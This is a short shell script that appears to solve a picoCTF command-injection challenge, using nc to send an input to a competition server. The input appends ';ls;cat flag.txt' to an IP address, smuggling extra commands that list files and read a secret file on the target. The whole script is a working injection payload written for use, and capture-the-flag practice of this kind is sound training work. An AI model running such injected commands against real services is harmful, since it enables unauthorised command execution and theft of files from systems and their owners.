#!/usr/bin/env sh NC_HOST="mysterious-sea.picoctf.net" NC_PORT="50850" PAYLOAD="8.8.8.8;ls;cat flag.txt" nc "$NC_HOST" "$NC_PORT" <<<"$PAYLOAD"